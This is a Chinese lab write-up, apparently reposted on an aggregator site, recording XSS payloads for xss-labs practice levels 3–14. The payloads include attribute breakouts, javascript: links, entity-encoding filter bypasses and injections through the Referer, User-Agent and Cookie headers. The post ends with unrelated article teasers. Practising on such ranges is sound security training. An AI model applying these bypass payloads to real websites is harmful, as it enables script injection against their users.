xss-labs靶场练习部分记录

news2024/11/16 17:35:58

目录

靶场环境

测试使用

evel3

evel5

evel6

evel7

evel8

evel9

evel10

evel11

evel12

evel13

evel14

靶场环境

browser:firefox;plugin:Hackbar,tools:burp

注:常见payload在评论区

测试使用

" ' <> scRiPt oNeEror  oNcLicK a hReF

evel3

<input name=keyword  value='' onclick ='javascript:alert(1)''>

evel5

<> script onclick被过滤,用a标签绕过

<input name=keyword  value=""></input><a href='javascript:alert(1)'>asd</a>">

keyword="></input><a href='javascript:alert(1)'>asd</a>&submit=%E6%90%9C%E7%B4%A2

evel6

evel7

<input name=keyword  value="" ' <>  error  click a ">

keyword="oonnclick ="javascript:alert(1)&submit=%E6%90%9C%E7%B4%A2 

evel8

</center><center><BR><a href="&quot ' <> scr_ipt o_nerror  o_nclick a hr_ef">友情链接</a></center><center><img src=level8.jpg></center>

十六进制编码绕过

java&#x73;cript:alert(1)

evel9

</center><center><BR><a href="您的链接不合法?有没有!">友情链接</a></center><center><img src=level9.png></center>
&quot; ' &lt;&gt; script oneeror  onclick a href

javascript:alert('http://www.baidu.com')

<input name=keyword  value="javascript:alert('http://www.baidu.com')">
<input type=submit name=submit value=添加友情链接 />
</form>
</center><center><BR><a href="javascr_ipt:alert('http://www.baidu.com')">友情链接</a></center><center><img src=level9.png></center>

javascr&#x69;pt:alert('http://www.baidu.com')

evel10

<input name="t_link"  value="" type="hidden">
<input name="t_history"  value="" type="hidden">
<input name="t_sort"  value="" type="hidden">

t_sort=11

<input name="t_sort"  value="11" type="hidden">

t_sort=11"type="button" οnclick="alert(11)

evel11

<input name="t_ref"  value="http://localhost:8081/level10.php?t_sort=11%22type=%22button%22%20οnclick=%22alert(11)" type="hidden">

抓包修改referer

GET /level11.php?keyword=12 HTTP/1.1
Referer: " type="text" οnclick="alert(11)

<input name="t_ref" value="" type="text" οnclick="alert(11)" type="hidden">

evel12

t_ua" value="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36" type="hidden">

User-Agent: "type="text" οnclick="alert(11)

evel13

<input name="t_cook" value="call me maybe?" type="hidden">

Cookie: user= " οnfοcus=alert(/xss/) type="text

evel14

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/73273.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

MySQL 的日志(undo log、redo log、binlog)

MySQL 的日志(undo log、redo log、binlog)

我们在MYSQL执行过程文章中知道一条SQL语句执行流程是怎么样的&#xff0c;但SQL语句是怎么入库的呢&#xff1f;如下图&#xff1a; SQL语句入库过程在图中涉及三个日志&#xff1a; undo log&#xff08;回滚日志&#xff09;、redo log&#xff08;重做日志&#xff09; 、b…
阅读更多...
TI RM57 如何配置RTI作为定时器使用

TI RM57 如何配置RTI作为定时器使用

引言 最近公司要对新项目的算法进行评估&#xff0c;这就需要拿到RM57浮点运算能力数据&#xff0c;测量运算速度就要用到高精度定时器&#xff0c;通过查看芯片手册发现RTI可以满足这个需求&#xff0c;本文对RTI的配置和使用做一个详细的记录&#xff0c;方便以后翻看。 ui…
阅读更多...
Python的Socket编程

Python的Socket编程

Python的Socket编程一、Socket简介二、Socket基本参数和函数介绍1. socket参数2.socket相关函数三、Python编写socket的步骤1.python编写server的步骤2.python编写client的步骤四、python socket变成实操1.server.py2.client.py3.socket更多功能五、案例1.TCP案例一&#xff1a…
阅读更多...
推特如何解除敏感内容限制

推特如何解除敏感内容限制

推特如何解除敏感内容的限制&#xff0c;这里为大家分别介绍苹果、安卓、网页版的推特怎么看敏感内容&#xff0c;有需要的朋友可以看一下。 一、苹果安卓手机解除敏感内容方法&#xff08;对应中英文版&#xff09; 1.打开手机推特app&#xff0c;点击左上角的【三横】进入个…
阅读更多...
Navicat for MySQL —— 图形化工具使用

Navicat for MySQL —— 图形化工具使用

Navicat for MySQL 下载链接&#xff1a;点击跳转 提取码&#xff1a;520H 在之前的篇目当中讲到数据库的图形化工具 —— SQLyog的使用&#xff0c;那么本篇目讲的是关于另外一款图形化工具的使用 —— Navicat for MySQL &#xff1b;下面先来安装Navicat for MySQL: Navic…
阅读更多...
Linux权限(下)

Linux权限(下)

Linux权限下file指令目录的权限x权限r权限w权限文件的默认权限umask码修改umask码粘滞位背景谁能删除设有粘滞位的目录下的文件&#xff1f;设置粘滞位的注意事项file指令 在此之前我们先了解一个指令&#xff0c;这个指令可以让我们更详细的了解文件的具体类型&#xff0c;虽…
阅读更多...
离散数学与组合数学-01

离散数学与组合数学-01

文章目录1. 离散数学与组合数学大纲要求概述1.1 离散数学概述1.2 组合数学概述1.3. 离散数学前言第1章 数理逻辑1.1 命题与联结词1. 命题2.联结词2.集合论3.代数系统4.图论本博客内容为参考B站视频做的笔记 大家多学习&#xff0c;努力考&#x1f4af;&#x1f4af;&#x1f4a…
阅读更多...
行业洞察 | 当数据燃尽,AI大模型出路几何?

行业洞察 | 当数据燃尽,AI大模型出路几何?

近期&#xff0c; 自然语言处理NLP与图像方面的SOTA的模型基本都是基于大数据和大模型预训练pretrain的。当我们翱翔在搭积木垒大模型的时候&#xff0c;你可曾想过&#xff0c;也许我们垒的大模型&#xff0c;数据压根就无法完全训练好&#xff0c;换句话说也许你垒的大模型参…
阅读更多...
BIO和NIO

BIO和NIO

前言 这段时间自己在看一些Java中BIO和NIO之类的东西&#xff0c;看了很多博客&#xff0c;发现各种关于NIO的概念说的天花乱坠头头是道&#xff0c;可以说是非常的完整&#xff0c;但是整个看下来之后&#xff0c;自己对NIO还是一知半解的状态&#xff0c;所以这篇文章不会提…
阅读更多...
Java ssm框架 mysql实现的酒店管理系统源码+运行教程+文档

Java ssm框架 mysql实现的酒店管理系统源码+运行教程+文档

今天给大家演示一下由ssmmysql实现的一款酒店管理系统&#xff0c;教大家怎么配置运行起来&#xff0c;以及在运行过程中遇到一些小问题的解决方法。该系统实现了酒店客房预订管理的基本功能&#xff0c;还增加了图表显示统计结果的功能&#xff0c;对于Java初学者及学生来说非…
阅读更多...
自动化测试平台(二):开发用户认证接口

自动化测试平台(二):开发用户认证接口

一、前言 对于一个系统来讲&#xff0c;用户模块是非常基本且重要的。搭建的测试平台也需要对用户、用户权限等进行管理。下面为你讲解如何通过DRF来快速的做一个用户登录的验证接口。 二、验证登录讲解 1&#xff09;创建用户 进入django的项目目录&#xff0c;执行下面的命…
阅读更多...
Renderbus瑞云渲染正式支持UE云渲染!离线渲染+实时渲染=渲染起飞!

Renderbus瑞云渲染正式支持UE云渲染!离线渲染+实时渲染=渲染起飞!

2022年已经到了尾声&#xff0c;回顾今年CG圈里最具讨论性的话题&#xff0c;除了AI绘图&#xff0c;就是虚幻引擎了&#xff0c;这两者如同一股风潮&#xff0c;从概念创意到后期制作&#xff0c;一路以“席卷”之势影响到了视觉领域的各个行业。 Renderbus瑞云渲染农场作为亚…
阅读更多...
CMake中add_custom_target的使用

CMake中add_custom_target的使用

CMake中的add_custom_target命令用于添加一个没有输出的target&#xff0c;以便始终构建它&#xff0c;其格式如下&#xff1a; add_custom_target(Name [ALL] [command1 [args1...]][COMMAND command2 [args2...] ...][DEPENDS depend depend depend ... ][BYPRODUCTS [files…
阅读更多...
vue中使用visibilitychange事件来获取页面当前可见性

vue中使用visibilitychange事件来获取页面当前可见性

前言 在系统中&#xff0c;如果有打开新页面进行相关操作&#xff0c;若是有关联操作就需要通过判断页面的可见性来进行后绪的操作 一、触发visibilitychange变更的情况 页面的可见性有三个层面 页面可见时&#xff0c;用户关闭 Tab 页或浏览器窗口。页面可见时&#xff0c…
阅读更多...
ASP.NET Zero Core系统配置工具

ASP.NET Zero Core系统配置工具

ASP.NET Zero Core系统配置工具 ASP。NET Zero是具有现代复杂应用程序连接的新web应用程序的起点。使用高级页面和强大的下属&#xff0c;您将能够从您的时间中受益。您可以使用ASP.NET ZERO作为基础程序&#xff0c;直接开始开发自己的代码和业务。 ASP.NET ZERO工具选项和功能…
阅读更多...
sklearn中的特征选择feature_selection

sklearn中的特征选择feature_selection

特征选择 概念&#xff1a;就是从所有的特征中&#xff0c;选择出有意义&#xff0c;对模型有帮助的特征&#xff0c;以避免必须将所有特征都导入模型去训练的情况。特征选择常用的方法有&#xff1a;过滤法&#xff0c;嵌入法&#xff0c;包装法&#xff0c;和降维算法 过滤…
阅读更多...
BN128曲线

BN128曲线

1. 引言 BN系列椭圆曲线E(Fp):y2x3b&#xff0c;其中b≠0E(\mathbb{F}_p):y^2x^3b&#xff0c;其中b\neq 0E(Fp​):y2x3b&#xff0c;其中b​0&#xff0c;由Paulo S. L. M. Barreto1 和 Michael Naehrig 在2005年论文 Pairing-Friendly Elliptic Curves of Prime Order中首…
阅读更多...
增长思维 —— 撬动企业增长的杠杆

增长思维 —— 撬动企业增长的杠杆

增长一定不是只适用于互联网公司 营销&#xff1a;获客 增长&#xff1a;研究的是用户全生命周期 增长思维&#xff1a;以供需分析为基础&#xff0c;从用户全生命周期寻找增长点的方法论 这个模型的核心是啊哈时刻&#xff0c;指的是一个产品对用户价值感最强的那个点 一个…
阅读更多...
画饼画到世界地图上:按比例呈现多组数据

画饼画到世界地图上:按比例呈现多组数据

地图是数据可视化的一部分&#xff0c;做群体遗传学、动物学、植物学、微生物学等的朋友经常用到世界地图&#xff0c;比如绘制不同小麦品种的世界分布。一般情况下&#xff0c;我们根据经纬度将数据标注在地图上&#xff0c;然而有些时候&#xff0c;我们会需要更高级的标注&a…
阅读更多...
Apache doris 1.2.0 release

Apache doris 1.2.0 release

亲爱的社区小伙伴们&#xff0c;再一次经历数月的等候后&#xff0c;我们很高兴地宣布&#xff0c;Apache Doris 于 2022 年 12 月 7 日迎来 1.2.0 Release 版本的正式发布&#xff01;有近 118 位 Contributor 为 Apache Doris 提交了超 2400 项优化和修复&#xff0c;感谢每一…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023